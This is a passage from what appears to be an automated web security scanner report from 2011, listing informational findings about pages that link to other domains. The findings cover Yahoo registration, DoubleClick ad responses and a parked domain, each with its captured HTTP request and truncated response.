Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j2VdaGye07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:37 GMT
Connection: close
Content-Length: 3235

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<noscript><a href='http://spamlaws.us.intellitxt.com/al.asp?ts=20110426142113&at=39&ipid=10143&di=31742909&syid=0&adid=0&pid=2&cc=us&rcc=us&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&ll=0&hbll=0&id=FCBEC610ABA64BC3BAF092D3EB42D7C0&idh=e18a41658ec9c9c740dc1b91edbc4646&pvu=59196390591647FA9372FACB8C10DBA5&pvm=35e167e1c66fee62be98fe397190a726&uf=0&ur=0&llip=0&ttv=1&redir=http%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2423626%26Page=%26PluID=0%26EyeblasterID=4992589%26Pos=40659516510664%26ord=%5btimestamp%5d' target='_blank'><img src='http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2423626&Page=&PluID=0&EyeblasterID=4992589&Pos=40659516510664&ord=[timestamp]' border=0 width=300 height=250>
...[SNIP]...

20.6. https://edit.yahoo.com/registration  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /registration

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /registration?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=8rcxbXg95hel0MytgTDr_2B2BVW0jVQ7tmPJEs0j5AdXZUbybwmQZsK068tjIvf6fYYxCmH8sgZKRD4nnaFbjRWnNh0tzBZZPI2TlrRCtwN9ysEBdYbFFQazweu3F.kqY7kl94s5Eq0mFfPFH2RWxS14zsQgGNEiePX.qwRuZSNYyhi7khtbCFI_IZp1LMsy.3gF5Dxxjeow9Zm6fusz3hOtSDsrsaDHGtyrL2wQxmLtoE4J7ppVLywJKGUp10gymzlZvt3Bo.2oy9nEuAfWDpwmnabn81GNWisNd11D_e6WMQs2naRzFa8WRHeyvGOQCFHb0wWqVdFG3Vxq9Heb_LiLJRAPFTAGEtpHyk7jX.8lnein3dyeJIbqpiXqw3HvQ3OE8Za3L6TkP49RDB4lIF2cj1T2LGB2M.ZV450VG0Ck7IqiOovO94EXpPikk207OLESF0yStMJphO8GChEL3kZP

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:40 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 52925


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">    
   <t
...[SNIP]...
</noscript>
<link href="https://s.yimg.com/lq/lib/membership/build/css/registration/221532.css" type="text/css" rel="stylesheet" />


<style type="text/css">
...[SNIP]...
<!-- intl = us, spaceid = 150001817 offset = 0 position = HEAD -->
<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
01817:HEAD/Y=YAHOO/EXP=1303833400/L=NeszSESO8UmKRmeZTatPkQG6rcHW8022zxgACNV0/B=9K9RkEwNPHY-/J=1303826200746383/K=e97cLXpBAiffeTkRecMHLw/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
tVCjJuxC4h7I2q2Hf1vfza6Nv3zojIYorjqLKegfwuvNNeVvlcb49Ge3pfR62Y7KWkjMnP4RumUzhXktiU0.R4_zjxnUB.lAMOLrGKJmvQZfvwjy0fLG9zxS9Oc63RsWU2o7ZnYsxljmxmeKH0MXU9jY8s8qcz8YNbs0WofSU2f..Gy~B%26.pd=" class="inline"><img src="https://s.yimg.com/lq/i/reg/yahoo-icon.png" border="0"/></a>
           <a id="fBtnLnk" href="https://open.login.yahoo.com/openid/yrp/signin?idp=facebook&ts=1303826200&.intl=us&.done=http%3A%2F%2Fdownloads.yahoo.com%2Findex.php&rpcrumb=GSd%2fl4fGRtl&.src=ydl" class="inline"><img src="https://s.yimg.com/lq/i/reg/fb-icon.png" border="0"/></a>
       <a id="gBtnLnk" href="https://open.login.yahoo.com/openid/yrp/signin?idp=google&ts=1303826200&.intl=us&.done=http%3A%2F%2Fdownloads.yahoo.com%2Findex.php&rpcrumb=GSd%2fl4fGRtl&.src=ydl" class="inline"><img src="https://s.yimg.com/lq/i/reg/google-icon.png" border="0"/></a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1284ar54m(gid$NeszSESO8UmKRmeZTatPkQG6rcHW8022zxgACNV0,st$1303826200751816,v$1.0))&t=J-D"></noscript>
...[SNIP]...

20.7. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1359940;type=merri082;cat=globa539;ord=1;num=3025314772967.249? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 12:28:21 GMT
Expires: Tue, 26 Apr 2011 12:28:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 839

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://pclick.yahoo.com/p/s=2145004132&t=fIHeOerSoK" width="1" height="1"/>
<img src="http://pixel.quantserve.com/pixel/p-b5_6SMtDRdLRM.gif?labels=_fp.event.application+starters" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
<img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=boanc2_cs=1&betq=12888=434144" width = "1" height = "1" border = "0">
<img src="https://ad.yieldmanager.com/pixel?id=1028071&t=2" width="1" height="1" />
<img src="https://ad.doubleclick.net/activity;src=1862678;dcnet=4856;boom=43223;sz=1x1;ord=65217270?"width="1" height="1" border="0" alt="">
...[SNIP]...

20.8. http://freemarker.com/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemarker.com
Path:   /landing.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /landing.php?d=freemarker.com HTTP/1.1
Host: freemarker.com
Proxy-Connection: keep-alive
Referer: http://freemarker.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=i7s9s5sueqcrhpr4chuavarau2

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 13:03:55 GMT
Server: lighttpd
Content-Length: 20955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>freemar
...[SNIP]...
<td class="title2">

<a href="http://domainbrokers.com/index.php?page=offer&amp;domain=freemarker.com" target="_blank">Click here to make an offer on this domain name</a>
...[SNIP]...

20.9. http://freemarker.com/top.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemarker.com
Path:   /top.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /top.php?d=freemarker.com HTTP/1.1
Host: freemarker.com
Proxy-Connection: keep-alive
Referer: http://freemarker.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=i7s9s5sueqcrhpr4chuavarau2

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 13:03:54 GMT
Server: lighttpd
Content-Length: 2311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>popup management</title>
<script
...[SNIP]...
<p><img border="0" src="http://hf.davinci.com/static/common/images/spacer.gif" width="0" height="0" alt=""></p>
...[SNIP]...

20.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303840507&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303822714507&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303822714595&frm=0&adk=1819763764&ga_vid=1959915173.1303822715&ga_sid=1303822715&ga_hid=366037720&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=165&xpc=b1RJU4fUjz&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 12:58:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12716

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.datadirect.com/odbc_64bit%26adT%3D64-bit%2BODBC%2BDriver%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.Confio.com/SQL-Server%26adT%3DSQL%2BServer%2B2005%2BTool%26gl%3DUS&amp;usg=AFQjCNEdpwH02TBVWmF3f-ZRuO8j3alMcA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 14:20:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1722

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D"></script>
...[SNIP]...

20.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835716&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Fdsaddthiscom%2Fnginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html&dt=1303817716586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817716592&frm=0&adk=1607234649&ga_vid=1254415124.1303817717&ga_sid=1303817717&ga_hid=736665545&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=12&xpc=3mvYeb6LF6&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 11:35:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4391

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/dsaddthiscom/nginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.qualys.com/dummies%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHMs7raq47VPy7ghQcLK-IBsBDJyg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800338&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-database-user-admin-http-header-injection-reflected-xss-ghdb-learnbridgefrontcom.htm&dt=1303782338417&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303782338418&frm=0&adk=1819763764&ga_vid=1177448180.1303782338&ga_sid=1303782338&ga_hid=1205769705&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=923&bih=928&eid=33895130&fu=0&ifi=1&dtd=7&xpc=MhckVFz5O1&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:45:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4366

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/blind-sql-injection-database-user-admin-http-header-injection-reflected-xss-ghdb-learnbridgefrontcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFeLcMXe6SkLQS0d4Z0gTNSKa8Ihg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=250&slotname=9565114904&w=300&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665658&bpp=3&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104&correlator=1303827663964&frm=0&adk=1483788359&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=3&dtd=214&xpc=aKybLTpwRf&p=http%3A//www.spamlaws.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 14:20:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4741

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CJKlm565s-yHAhCsAhj6ATIIKcLEODAr9v0">
...[SNIP]...
